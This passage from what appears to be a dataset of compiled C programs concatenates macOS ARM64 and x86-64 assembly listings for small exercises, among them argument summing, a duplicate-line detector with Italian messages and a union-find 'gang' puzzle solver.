Depth=1 movl -52(%rbp), %eax addl $1, %eax movl %eax, -52(%rbp) jmp LBB4_41 LBB4_44: movl $0, -56(%rbp) LBB4_45: ## =>This Inner Loop Header: Depth=1 cmpl $10, -56(%rbp) jge LBB4_48 ## %bb.46: ## in Loop: Header=BB4_45 Depth=1 callq _vector addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.47: ## in Loop: Header=BB4_45 Depth=1 movl -56(%rbp), %eax addl $1, %eax movl %eax, -56(%rbp) jmp LBB4_45 LBB4_48: movl $0, -60(%rbp) LBB4_49: ## =>This Inner Loop Header: Depth=1 cmpl $10, -60(%rbp) jge LBB4_52 ## %bb.50: ## in Loop: Header=BB4_49 Depth=1 callq _seq addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.51: ## in Loop: Header=BB4_49 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB4_49 LBB4_52: movl $0, -64(%rbp) LBB4_53: ## =>This Inner Loop Header: Depth=1 cmpl $10, -64(%rbp) jge LBB4_56 ## %bb.54: ## in Loop: Header=BB4_53 Depth=1 callq _seq addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.55: ## in Loop: Header=BB4_53 Depth=1 movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) jmp LBB4_53 LBB4_56: movl $0, -68(%rbp) LBB4_57: ## =>This Inner Loop Header: Depth=1 cmpl $10, -68(%rbp) jge LBB4_60 ## %bb.58: ## in Loop: Header=BB4_57 Depth=1 callq _seq addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.59: ## in Loop: Header=BB4_57 Depth=1 movl -68(%rbp), %eax addl $1, %eax movl %eax, -68(%rbp) jmp LBB4_57 LBB4_60: xorl %eax, %eax addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/242331813.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #8] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr w0, [sp, #8] ; 4-byte Folded Reload ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "c:\\backup\\texto\\novo\\arq.txt\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "c:\\backup\\texto\\novo\\arq.txt\n" .subsections_via_symbols
the_stack_data/1078832.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/541927.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] stur wzr, [x29, #-20] mov w8, #1 str w8, [sp, #24] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-20] str w8, [sp, #20] ; 4-byte Folded Spill ldur x8, [x29, #-16] ldrsw x9, [sp, #24] ldr x0, [x8, x9, lsl #3] bl _atoi ldr w8, [sp, #20] ; 4-byte Folded Reload add w8, w8, w0 stur w8, [x29, #-20] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_1 LBB0_4: ldur w8, [x29, #-8] subs w11, w8, #1 ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x10 mov x10, x11 str x10, [x9] str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %d " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movl $0, -20(%rbp) movl $1, -24(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -24(%rbp), %eax cmpl -8(%rbp), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax movl %eax, -28(%rbp) ## 4-byte Spill movq -16(%rbp), %rax movslq -24(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _atoi movl %eax, %ecx movl -28(%rbp), %eax ## 4-byte Reload addl %ecx, %eax movl %eax, -20(%rbp) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_1 LBB0_4: movl -8(%rbp), %esi subl $1, %esi movl -20(%rbp), %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %d " .subsections_via_symbols
the_stack_data/187642504.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _confronta_riga ; -- Begin function confronta_riga .p2align 2 _confronta_riga: ; @confronta_riga .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] ldur x0, [x29, #-8] ldur w1, [x29, #-12] bl _prendi_riga str x0, [sp, #24] ldr x8, [sp, #24] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w8, [x29, #-12] subs w8, w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_6 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x0, [x29, #-8] ldr w1, [sp, #20] bl _prendi_riga str x0, [sp, #8] ldr x0, [sp, #24] ldr x1, [sp, #8] bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-12] ldr w9, [sp, #20] subs w10, w8, w9 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #20] subs w8, w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_6: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _prendi_riga ; -- Begin function prendi_riga .p2align 2 _prendi_riga: ; @prendi_riga .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] adrp x8, l___const.prendi_riga.sep@PAGE add x8, x8, l___const.prendi_riga.sep@PAGEOFF ldrh w8, [x8] sub x9, x29, #14 str x9, [sp, #8] ; 8-byte Folded Spill sturh w8, [x29, #-14] ldur x0, [x29, #-8] bl _strdup ldr x1, [sp, #8] ; 8-byte Folded Reload str x0, [sp, #16] ldr x0, [sp, #16] bl _strtok str x0, [sp, #24] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #1 cset w8, le tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 mov x0, #0 sub x1, x29, #14 bl _strtok str x0, [sp, #24] ldur w8, [x29, #-12] subs w8, w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_3: ldr x0, [sp, #24] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] str wzr, [sp, #24] mov x1, #1 mov x0, x1 bl _calloc str x0, [sp, #16] mov w8, #1 str w8, [sp, #12] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 bl _getchar stur w0, [x29, #-20] adds w8, w0, #1 cset w8, eq tbnz w8, #0, LBB2_5 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldur w8, [x29, #-20] ldr x9, [sp, #16] ldr w10, [sp, #12] subs w10, w10, #1 strb w8, [x9, w10, sxtw] ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] ldr x0, [sp, #16] ldrsw x8, [sp, #12] lsr x1, x8, #0 bl _realloc str x0, [sp, #16] ldur w8, [x29, #-20] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] ldr x8, [sp, #16] ldr w9, [sp, #12] subs w9, w9, #1 add x8, x8, w9, sxtw strb wzr, [x8] ldr x0, [sp, #16] ldr w1, [sp, #24] bl _confronta_riga b LBB2_4 LBB2_4: ; in Loop: Header=BB2_1 Depth=1 b LBB2_1 LBB2_5: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x0, [sp, #16] bl _free mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%s\n" l_.str.1: ; @.str.1 .asciz "***questa riga \303\250 gi\303\240 stata letta %d righe fa***\n" l___const.prendi_riga.sep: ; @__const.prendi_riga.sep .asciz "\n" l_.str.2: ; @.str.2 .asciz "Ciao ciao!" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _confronta_riga ## -- Begin function confronta_riga .p2align 4, 0x90 _confronta_riga: ## @confronta_riga .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq -8(%rbp), %rdi movl -12(%rbp), %esi callq _prendi_riga movq %rax, -24(%rbp) movq -24(%rbp), %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl -12(%rbp), %eax subl $1, %eax movl %eax, -28(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -28(%rbp) jle LBB0_6 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rdi movl -28(%rbp), %esi callq _prendi_riga movq %rax, -40(%rbp) movq -24(%rbp), %rdi movq -40(%rbp), %rsi callq _strcmp cmpl $0, %eax jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %esi subl -28(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB0_4: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_5 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movl -28(%rbp), %eax addl $-1, %eax movl %eax, -28(%rbp) jmp LBB0_1 LBB0_6: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _prendi_riga ## -- Begin function prendi_riga .p2align 4, 0x90 _prendi_riga: ## @prendi_riga .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movw L___const.prendi_riga.sep(%rip), %ax movw %ax, -14(%rbp) movq -8(%rbp), %rdi callq _strdup movq %rax, -32(%rbp) movq -32(%rbp), %rdi leaq -14(%rbp), %rsi callq _strtok movq %rax, -24(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpl $1, -12(%rbp) jle LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 leaq -14(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -24(%rbp) movl -12(%rbp), %eax addl $-1, %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_3: movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movl $0, -24(%rbp) movl $1, %esi movq %rsi, %rdi callq _calloc movq %rax, -32(%rbp) movl $1, -36(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 callq _getchar movl %eax, -20(%rbp) cmpl $-1, %eax je LBB2_5 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -20(%rbp), %eax movb %al, %dl movq -32(%rbp), %rax movl -36(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movb %dl, (%rax,%rcx) movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) movq -32(%rbp), %rdi movslq -36(%rbp), %rsi shlq $0, %rsi callq _realloc movq %rax, -32(%rbp) cmpl $10, -20(%rbp) jne LBB2_4 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) movq -32(%rbp), %rax movl -36(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movb $0, (%rax,%rcx) movq -32(%rbp), %rdi movl -24(%rbp), %esi callq _confronta_riga LBB2_4: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_1 LBB2_5: leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq -32(%rbp), %rdi callq _free xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%s\n" L_.str.1: ## @.str.1 .asciz "***questa riga \303\250 gi\303\240 stata letta %d righe fa***\n" L___const.prendi_riga.sep: ## @__const.prendi_riga.sep .asciz "\n" L_.str.2: ## @.str.2 .asciz "Ciao ciao!" .subsections_via_symbols
the_stack_data/31642.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _diff ; -- Begin function diff .p2align 2 _diff: ; @diff .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w8, [sp, #12] adrp x9, _n@GOTPAGE ldr x9, [x9, _n@GOTPAGEOFF] ldr w9, [x9] add w8, w8, w9 adrp x9, _N@GOTPAGE ldr x9, [x9, _N@GOTPAGEOFF] ldr w10, [x9] sdiv w9, w8, w10 mul w9, w9, w10 subs w0, w8, w9 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _root ; -- Begin function root .p2align 2 _root: ; @root .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 adrp x8, _num@GOTPAGE ldr x8, [x8, _num@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill str w0, [sp, #28] ldr w8, [sp, #28] str w8, [sp, #20] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldrsw x9, [sp, #20] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldrsw x9, [sp, #20] ldr w8, [x8, x9, lsl #2] str w8, [sp, #20] b LBB1_1 LBB1_3: b LBB1_4 LBB1_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_4 Depth=1 ldr x9, [sp, #8] ; 8-byte Folded Reload ldrsw x8, [sp, #28] ldr w8, [x9, x8, lsl #2] str w8, [sp, #24] ldr w8, [sp, #20] ldrsw x10, [sp, #28] str w8, [x9, x10, lsl #2] ldr w8, [sp, #24] str w8, [sp, #28] b LBB1_4 LBB1_6: ldr w0, [sp, #20] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _n@GOTPAGE ldr x8, [x8, _n@GOTPAGEOFF] str x8, [sp, #40] ; 8-byte Folded Spill adrp x8, _num@GOTPAGE ldr x8, [x8, _num@GOTPAGEOFF] str x8, [sp, #48] ; 8-byte Folded Spill stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #24 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB2_1 LBB2_1: ; =>This Loop Header: Depth=1 ; Child Loop BB2_3 Depth 2 ; Child Loop BB2_7 Depth 2 ldur w8, [x29, #-24] subs w9, w8, #1 stur w9, [x29, #-24] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_20 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr x8, [sp, #40] ; 8-byte Folded Reload mov x9, sp str x8, [x9] sub x8, x29, #20 str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldr x8, [sp, #40] ; 8-byte Folded Reload ldr w9, [x8] mov w8, #2 mul w8, w8, w9 adrp x9, _N@GOTPAGE ldr x9, [x9, _N@GOTPAGEOFF] str w8, [x9] stur wzr, [x29, #-8] b LBB2_3 LBB2_3: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-8] adrp x9, _N@GOTPAGE ldr x9, [x9, _N@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_6 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=2 ldr x9, [sp, #48] ; 8-byte Folded Reload ldur w8, [x29, #-8] ldursw x10, [x29, #-8] str w8, [x9, x10, lsl #2] b LBB2_5 LBB2_5: ; in Loop: Header=BB2_3 Depth=2 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB2_3 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 stur wzr, [x29, #-8] b LBB2_7 LBB2_7: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_19 b LBB2_8 LBB2_8: ; in Loop: Header=BB2_7 Depth=2 bl _getchar mov x9, sp sub x8, x29, #33 str x8, [x9] sub x8, x29, #12 str x8, [x9, #8] sub x8, x29, #16 str x8, [x9, #16] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _scanf ldursb w8, [x29, #-33] subs w8, w8, #65 cset w8, ne tbnz w8, #0, LBB2_16 b LBB2_9 LBB2_9: ; in Loop: Header=BB2_7 Depth=2 ldur w0, [x29, #-12] bl _root stur w0, [x29, #-28] ldur w0, [x29, #-16] bl _root ldr x10, [sp, #40] ; 8-byte Folded Reload stur w0, [x29, #-32] ldur w8, [x29, #-28] ldr w11, [x10] sdiv w9, w8, w11 mul w9, w9, w11 subs w8, w8, w9 ldur w9, [x29, #-32] ldr w11, [x10] sdiv w10, w9, w11 mul w10, w10, w11 subs w9, w9, w10 subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB2_11 b LBB2_10 LBB2_10: ; in Loop: Header=BB2_7 Depth=2 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB2_15 LBB2_11: ; in Loop: Header=BB2_7 Depth=2 ldur w8, [x29, #-28] ldur w9, [x29, #-32] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_13 b LBB2_12 LBB2_12: ; in Loop: Header=BB2_7 Depth=2 adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB2_14 LBB2_13: ; in Loop: Header=BB2_7 Depth=2 adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB2_14 LBB2_14: ; in Loop: Header=BB2_7 Depth=2 b LBB2_15 LBB2_15: ; in Loop: Header=BB2_7 Depth=2 b LBB2_17 LBB2_16: ; in Loop: Header=BB2_7 Depth=2 ldur w0, [x29, #-12] bl _diff bl _root stur w0, [x29, #-28] ldur w0, [x29, #-16] bl _root ldr x9, [sp, #48] ; 8-byte Folded Reload stur w0, [x29, #-32] ldur w8, [x29, #-32] ldursw x10, [x29, #-28] str w8, [x9, x10, lsl #2] ldur w0, [x29, #-32] bl _diff str w0, [sp, #36] ; 4-byte Folded Spill ldur w0, [x29, #-28] bl _diff ldr x8, [sp, #48] ; 8-byte Folded Reload mov x9, x0 ldr w0, [sp, #36] ; 4-byte Folded Reload str w0, [x8, w9, sxtw #2] b LBB2_17 LBB2_17: ; in Loop: Header=BB2_7 Depth=2 b LBB2_18 LBB2_18: ; in Loop: Header=BB2_7 Depth=2 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB2_7 LBB2_19: ; in Loop: Header=BB2_1 Depth=1 b LBB2_1 LBB2_20: mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .comm _n,4,2 ; @n .comm _N,4,2 ; @N .comm _num,800008,2 ; @num .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d%d" l_.str.2: ; @.str.2 .asciz "%c%d%d" l_.str.3: ; @.str.3 .asciz "Not sure yet.\n" l_.str.4: ; @.str.4 .asciz "In the same gang.\n" l_.str.5: ; @.str.5 .asciz "In different gangs.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _diff ## -- Begin function diff .p2align 4, 0x90 _diff: ## @diff .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %eax movq _n@GOTPCREL(%rip), %rcx addl (%rcx), %eax movq _N@GOTPCREL(%rip), %rcx cltd idivl (%rcx) movl %edx, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _root ## -- Begin function root .p2align 4, 0x90 _root: ## @root .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %eax movl %eax, -12(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movslq -12(%rbp), %rcx movq _num@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax cmpl -12(%rbp), %eax je LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movslq -12(%rbp), %rcx movq _num@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_3: jmp LBB1_4 LBB1_4: ## =>This Inner Loop Header: Depth=1 movl -4(%rbp), %eax cmpl -12(%rbp), %eax je LBB1_6 ## %bb.5: ## in Loop: Header=BB1_4 Depth=1 movslq -4(%rbp), %rcx movq _num@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -8(%rbp) movl -12(%rbp), %edx movslq -4(%rbp), %rcx movq _num@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) movl -8(%rbp), %eax movl %eax, -4(%rbp) jmp LBB1_4 LBB1_6: movl -12(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -24(%rbp), %rsi movb $0, %al callq _scanf LBB2_1: ## =>This Loop Header: Depth=1 ## Child Loop BB2_3 Depth 2 ## Child Loop BB2_7 Depth 2 movl -24(%rbp), %eax movl %eax, %ecx addl $-1, %ecx movl %ecx, -24(%rbp) cmpl $0, %eax je LBB2_20 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 leaq L_.str.1(%rip), %rdi movq _n@GOTPCREL(%rip), %rsi leaq -20(%rbp), %rdx movb $0, %al callq _scanf movq _n@GOTPCREL(%rip), %rax movl (%rax), %ecx shll $1, %ecx movq _N@GOTPCREL(%rip), %rax movl %ecx, (%rax) movl $0, -8(%rbp) LBB2_3: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -8(%rbp), %eax movq _N@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB2_6 ## %bb.4: ## in Loop: Header=BB2_3 Depth=2 movl -8(%rbp), %edx movslq -8(%rbp), %rcx movq _num@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB2_3 Depth=2 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB2_3 LBB2_6: ## in Loop: Header=BB2_1 Depth=1 movl $0, -8(%rbp) LBB2_7: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -8(%rbp), %eax cmpl -20(%rbp), %eax jge LBB2_19 ## %bb.8: ## in Loop: Header=BB2_7 Depth=2 callq _getchar leaq L_.str.2(%rip), %rdi leaq -33(%rbp), %rsi leaq -12(%rbp), %rdx leaq -16(%rbp), %rcx movb $0, %al callq _scanf movsbl -33(%rbp), %eax cmpl $65, %eax jne LBB2_16 ## %bb.9: ## in Loop: Header=BB2_7 Depth=2 movl -12(%rbp), %edi callq _root movl %eax, -28(%rbp) movl -16(%rbp), %edi callq _root movl %eax, -32(%rbp) movl -28(%rbp), %eax movq _n@GOTPCREL(%rip), %rcx cltd idivl (%rcx) movl %edx, -40(%rbp) ## 4-byte Spill movl -32(%rbp), %eax movq _n@GOTPCREL(%rip), %rcx cltd idivl (%rcx) movl %edx, %eax movl -40(%rbp), %edx ## 4-byte Reload cmpl %eax, %edx je LBB2_11 ## %bb.10: ## in Loop: Header=BB2_7 Depth=2 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf jmp LBB2_15 LBB2_11: ## in Loop: Header=BB2_7 Depth=2 movl -28(%rbp), %eax cmpl -32(%rbp), %eax jne LBB2_13 ## %bb.12: ## in Loop: Header=BB2_7 Depth=2 leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf jmp LBB2_14 LBB2_13: ## in Loop: Header=BB2_7 Depth=2 leaq 